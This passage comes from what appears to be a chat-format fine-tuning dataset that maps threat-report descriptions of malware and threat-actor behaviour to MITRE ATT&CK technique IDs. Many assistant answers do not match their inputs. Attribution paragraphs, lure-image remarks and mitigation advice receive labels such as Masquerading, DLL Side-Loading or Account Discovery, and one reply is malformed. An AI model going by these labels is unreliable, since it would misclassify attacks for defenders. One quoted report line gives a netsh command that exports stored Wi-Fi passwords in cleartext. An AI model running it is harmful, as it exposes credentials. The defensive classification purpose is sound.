"assistant", "content": "T1111 - Multi-Factor Authentication Interception" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sandworm Team has tricked unwitting recipients into clicking on malicious hyperlinks within emails crafted to resemble trustworthy senders." }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Indicators File Hash Description x.js 3fefa55daeb167931975c22df3eca20a HOMEFRY, a 64-bit Windows password dumper/cracker mt.exe 40528e368d323db0ac5c3f5e1efe4889 MURKYTOP, a command-line reconnaissance tool  com4.js a68bf5fce22e7f1d6f999b7a580ae477 AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages Historical Indicators File Hash Description green.ddd 3eb6f85ac046a96204096ab65bbd3e7e AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages BGij 6e843ef4856336fe3ef4ed27a4c792b1 Beacon, a commercially available backdoor msresamn.ttf a9e7539c1ebe857bae6efceefaa9dd16 PHOTO, also reported as Derusbi 1024-aa6a121f98330df2edee6c4391df21ff43a33604 bd9e4c82bf12c4e7a58221fc52fed705 BADFLICK, backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command-and-control configuration" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Commands under net user can be used in to gather information about and manipulate user accounts." }, { "role": "assistant", "content": "T1087 - Account Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "named its tools to masquerade as Windows or Adobe Reader software, such as by using the file name adobecms.exe and the directory CSIDL_APPDATA\\microsoft\\security." }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The attack targeted at least one organization in Saudi Arabia, which aligns with the targeting of the initial Shamoon attacks. It appears the purpose of the new Disttrack samples were solely focused on destruction, as the samples were configured with a non-operational C2 server to report to and were set to begin wiping data exactly on 2016/11/17 20:45. Disttrack uses the internal domain names and credentials to log into remote systems on the same network segment. The dropper then attempts to open the service manager on each remote system to start the RemoteRegistry service, which it will connect to using RegConnectRegistryW. The dropper then checks to see if it has administrator privileges on the remote system by attempting to open \"\\system32\\csrss.exe\", which allows it to determine if it can write its payload to the \"\\system32\" folder on the remote system. Scheduled tasks require a time in which the task will run, which the dropper determines by calling the function NetRemoteTOD to obtain the time of day from the remote system. While completely speculative, the word “shinu” used as a parameter could be a reference to the Arabic slang for the word “what”, as well as a reference to a village name in northwestern Iran. It appears that the “drdisk.sys” driver (SHA256: 4744df6ac02ff0a3f9ad0bf47b15854bbebb73c936dd02f7c79293a2828406f6) is the exact same driver as used in the Shamoon attack in 2012. During this activity, we noticed the wiper changing the system time to August 2012, as the temporary license key for the RawDisk driver requires the system time to not exceed the month of August, which is when the temporary license would expire. The current attack campaign has several TTP overlaps with the original Shamoon campaign, especially from a targeting and timing perspective" }, { "role": "assistant", "content": "T1036.004 - Masquerading: Masquerade Task or Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Magic Hound has lured victims into executing malicious files." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Figure 1 Side-by-side of the lure images within ThreeDollars in the October 2017 and the January 2018 attacks   Superficially, we can immediately see the images are quite similar, but with some glaring differences" }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FunnyDream can use com objects identified with `CLSID_ShellLink`(`IShellLink` and `IPersistFile`) and `WScript.Shell`(`RegWrite` method) to enable persistence mechanisms." }, { "role": "assistant", "content": "T1559.001 - Component Object Model" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BoxCaon can download files." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware performs the following activities: Builds imports by dynamically loading APIs Decrypts strings needed for control server communications Performs control server communications Handles commands issued by the control server Uninstalls self from the system The malicious thread dynamically loads the APIs it needs at the beginning of its execution using LoadLibrary() and GetProcAddress()" }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The loader implements itself with the name Security Support Provider, a legitimate Windows function. Various .exe files mimic legitimate file names used by Microsoft, Symantec, Kaspersky, Hewlett-Packard, and VMWare. also disguised malicious modules using similar filenames as custom network encryption software on victims." }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Stolen Pencil utilized RDP for direct remote point-and-click access." }, { "role": "assistant", "content": "T1021.001 - Remote Services: Remote Desktop Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DustySky can compress files via RAR while staging data to be exfiltrated." }, { "role": "assistant", "content": "T1560.001 - Archive Collected Data: Archive via Utility" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SideCopy has identified the IP address of a compromised host." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Night Dragon, threat actors enticed users to click on links in spearphishing emails to download malware." }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT38 used a Trojan called KEYLIME to capture keystrokes from the victim’s machine." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The executable version of Helminth has a module to log clipboard contents." }, { "role": "assistant", "content": "T1115 - Clipboard Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Wocao, threat actors used scheduled tasks to execute malicious PowerShell code on remote systems." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Siloscape searches for the Kubernetes config file and other related files using a regular expression." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Axiom has used steganography to hide its C2 communications." }, { "role": "assistant", "content": "T1001.002 - Data Obfuscation via Steganography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Strike has the ability to use an Excel Workbook to execute additional code by enabling Office to trust macros and execute code without user permission." }, { "role": "assistant", "content": "T1137.001 - Office Application Startup: Office Template Macros." } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TA505 has used VBS for code execution." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "accesses network share(s), enables share access to the target device, and copies an executable payload to the target system, and uses a to execute the malware." }, { "role": "assistant", "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Upon execution, the Micropsia malware takes screenshots every 90 seconds by calling to Gdi32.BitBlt API. Screenshots are saved as unencrypted files in JPEG format with a specific file name that contains the current timestamp (yyyy-mm-dd hh-nn-ss) with the hardcoded extension .his" }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SILENTTRINITY can scan for open ports on a compromised machine." }, { "role": "assistant", "content": "T1046 - Network Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MuddyWater has used Daniel Bohannon’s Invoke-Obfuscation framework and obfuscated PowerShell scripts. The group has also used other obfuscation methods, including Base64 obfuscation of VBScripts and PowerShell commands." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Opening document starts a template injection technique for loading the document template from the internet." }, { "role": "assistant", "content": "T1221 - Template Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mustang Panda has used a customized PlugX variant which could exfiltrate documents from air-gapped networks." }, { "role": "assistant", "content": "T1052.001 - Exfiltration over USB" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HAWKBALL can collect the OS version, architecture information, and computer name." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In January 2016 we published our analysis of a spearphishing attack against energy companies in Ukraine. That attack probably has a connection to the infamous BlackEnergy attacks in 2015 because the attackers used exactly the same mail server to send spearphishing messages. However, the attacks in January 2016 were different. Instead of using the BlackEnergy malware family, the attackers used a relatively simple open-source backdoor, written in the Python programming language, called GCat. The Python code of the GCat backdoor was obfuscated, then converted into a stand-alone executable using the PyInstaller program" }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "identified and browsed file servers in the victim network, sometimes , viewing files pertaining to ICS or Supervisory Control and Data Acquisition (SCADA) systems." }, { "role": "assistant", "content": "T1135 - Network Share Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Contacts an IP address / domain that was used to host a malicious document from a Lazarus previous campaign in 2017 - Same author appeared in these recent malicious documents that also appeared back in Lazarus 2017 campaigns - Uses the same malicious document structure and similar job recruitment ads as what we observed in past Lazarus campaigns - The techniques, tactics and procedures align with Lazarus group’s interest in crypto currency theft" }, { "role": "assistant", "content": "T1001.003 - Protocol or Service Impersonation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bandook can collect information about the drives available on the system." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "may use WMI when collecting information about a victim." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ROKRAT can use the `GetForegroundWindow` and `GetWindowText` APIs to discover where the user is typing." }, { "role": "assistant", "content": "T1010 - Application Window Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group has queried an active directory server to obtain the list of accounts, including administrator accounts." }, { "role": "assistant", "content": "T1087.002 - Account Discovery: Domain Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "prompts users for their credentials." }, { "role": "assistant", "content": "T1056 - Input Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In order to avoid raising suspicions from the victim, CSPY Downloader exploits a known UAC bypass technique that uses the SilentCleanup task to execute the binary with elevated privileges" }, { "role": "assistant", "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can enumerate Registry keys." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "VBShower has attempted to complicate forensic analysis by deleting all the files contained in \"%APPDATA%\\..\\Local\\Temporary Internet Files\\Content.Word\" and \"%APPDATA%\\..\\Local Settings\\Temporary Internet Files\\Content.Word\\\"." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Restricting these privileges may prevent malware from running or limit its capability to spread through the network.Carefully consider the risks before granting administrative rights to users on their own machines.Scrub and verify all administrator accounts regularly.Configure Group Policy to restrict all users to only one login session, where possible.Enforce secure network authentication, where possible.Instruct administrators to use non-privileged accounts for standard functions such as web browsing or checking webmail.Segment networks into logical enclaves and restrict host-to-host communication paths" }, { "role": "assistant", "content": "T1087 - Account Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Watches uninstall time, checks time diff (local time vs internet time)" }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In order to download the additional modules, the malware uses the BITSAdmin tool, which this group has relied on for some years to avoid detection, since this is an allowlisted tool from the Windows operating system. By the end of September 2019, we started seeing a new version of Guildma malware being distributed that used a new technique for storing downloaded payloads in NTFS Alternate Data Streams in order to conceal their presence in the system" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Because the DLL/EXE is loaded reflectively, it is not displayed when tools are used to list the DLLs of a running process. This tool can be run on remote servers by supplying a local Windows PE file (DLL/EXE) to load in to memory on the remote system, this will load and execute the DLL/EXE in to memory without writing any files to disk." }, { "role": "assistant", "content": "T1620 - Reflective Code Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CallMe exfiltrates data to its C2 server over the same protocol as C2 communications." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Containment provided by enclaving also makes incident cleanup significantly less costly.Configure firewalls to disallow Remote Desktop Protocol (RDP) traffic coming from outside of the network boundary, except for in specific configurations such as when tunneled through a secondary virtual private network (VPN) with lower privileges.Audit existing firewall rules and close all ports that are not explicitly needed for business" }, { "role": "assistant", "content": "T1021.001 - Remote Services: Remote Desktop Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Calisto installation file is an unsigned DMG image under the guise of Intego’s security solution for Mac" }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "actors leverage legitimate credentials to log into external remote services." }, { "role": "assistant", "content": "T1078 - Valid Accounts', 'T1133 - External Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bazar can enumerate shared drives on the domain." }, { "role": "assistant", "content": "T1135 - Network Share Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is capable of deleting Registry keys, sub-keys, and values on a victim system." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SLOTHFULMEDIA can inject into running processes on a compromised host." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GALLIUM used PowerShell for execution to assist in lateral movement as well as for dumping credentials stored on compromised machines." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Types of attacks possibly averted include Structured Query Language (SQL) injection, cross-site scripting, and command injection.Use stringent file reputation settings – Tune the file reputation systems of your anti-virus software to the most aggressive setting possible" }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Capable of stealing documents sent to the printer queue. Steals written CD images. Capable of stealing files previously seen on removable drives once they are available again. Steals Internet Explorer, Netscape Navigator, FireFox and RealNetworks cookies. If deleted from Frontend file or related registry values, it will reappear after reboot with a new name and startup type" }, { "role": "assistant", "content": "T1025 - Data from Removable Media" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "attempts to hide its payloads using legitimate filenames." }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "kaudited — A file installed as /usr/bin/kaudited. This binary will drop and install several loadable kernel modules (LKMs) on the infected machine. To ensure that the infected machine won’t crash due to the kernel-mode rootkits, it uses different modules for specific kernel versions. The kaudited binary also drops a watchdog component that will monitor the cryptocurrency miner file and process" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "One of the first steps that several Mosquito installer packages performed after writing and running this local_update js file was to export all local host’s WiFi profiles (settings and passwords) to %APPDATA%\\.xml with a command line call: cmd.exe /c netsh wlan export profile key=clear folder=\"%APPDATA%\" They then gather more network information with a call to ipconfig and arp -a" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Leviathan has sent spearphishing email links attempting to get a user to click." }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT38 has used PowerShell to execute commands and other operational tasks." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "As mentioned in the Hermes to Ryuk section, Ryuk uses a combination of symmetric (AES) and asymmetric (RSA) encryption to encrypt files. Without the private key provided by WIZARD SPIDER, the files cannot be decrypted and are unrecoverable. A thread is created for the encryption of each file and each file is encrypted with its own AES key. After the file has been encrypted, a file extension of .RYK is appended to the file. All directories will have a ransom note of (RyukReadMe.txt) written to the directory" }, { "role": "assistant", "content": "T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware also monitors all fixed and removable drives mapped on the local system. Whenever a new drive is inserted, it creates a list of all the files on the drive and stores it encrypted in a file" }, { "role": "assistant", "content": "T1119 - Automated Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group malware IndiaIndia checks Registry keys within HKCU and HKLM to determine if certain applications are present, including SecureCRT, Terminal Services, RealVNC, TightVNC, UltraVNC, Radmin, mRemote, TeamViewer, FileZilla, pcAnyware, and Remote Desktop. Another Lazarus Group malware sample checks for the presence of the following Registry key:\"HKEY_CURRENT_USER\\Software\\Bitcoin\\Bitcoin-Qt\"." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The developer implemented a total of seven techniques to identify if the compromised system is a virtual machine. Additionally, the malware checks the SerialNumber and the version of the BIOS. The third technique uses the Win32_Computer entry in WMI. It checks if the manufacturer contains \"VIRTUAL\", \"VMWARE\" or \"VirtualBox\". The fourth technique checks the Processor ID of the system. The WMI request simply replies \"not supported\". This behaviour can be used to detect if the targeted system is a real machine. The last technique uses the MAC Address of the infected system. If the MAC Address starts by a well-known hexadecimal number, the system is identified as a virtual machine. The variant version of GX is used in the URI" }, { "role": "assistant", "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "We attribute this campaign with high confidence to an actor named WIRTE, which is a lesser-known threat actor first publicly referenced by our colleagues at Lab52 in 2019. We further suspect, with low confidence, that the WIRTE group has relations with the Gaza Cybergang threat actor" }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AuTo Stealer has the ability to collect the username from an infected host." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Looking at earlier attacks between 2013 and 2016, we believe Comnie was also used in targeted attacks against the following individuals or organizations: Taiwan government IT service vendor in Asia Journalist of a Tibetan radio station Figure 6 Email sent to Journalist of Tibetan radio station   Malicious Macros The malicious macro documents used to deliver Comnie initially hide the content inside and requests that the user enables macros prior to viewing the document" }, { "role": "assistant", "content": "T1598.002 - Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT28 has used Forfiles to locate PDF, Excel, and Word documents during collection. The group also searched a compromised DCCC computer for specific terms." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POLONIUM has exfiltrated stolen data to POLONIUM-owned OneDrive and Dropbox accounts." }, { "role": "assistant", "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group has sent malicious links to victims via email." }, { "role": "assistant", "content": "T1566.002 - Phishing: Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LoJax has loaded an embedded NTFS DXE driver to be able to access and write to NTFS partitions." }, { "role": "assistant", "content": "T1564.004 - Hide Artifacts: NTFS File Attributes" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BRONZE BUTLER downloads encoded payloads and decodes them on the victim." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This round of FIN7 phishing lures implements hidden shortcut files (LNK files) to initiate the infection and VBScript functionality launched by mshta.exe to infect the victim" }, { "role": "assistant", "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Vasport creates a backdoor by making a connection using a HTTP POST." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Hildegard has disguised itself as a known Linux process." }, { "role": "assistant", "content": "T1036.004 - Masquerading: Masquerade Task or Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LoJax has modified the Registry key 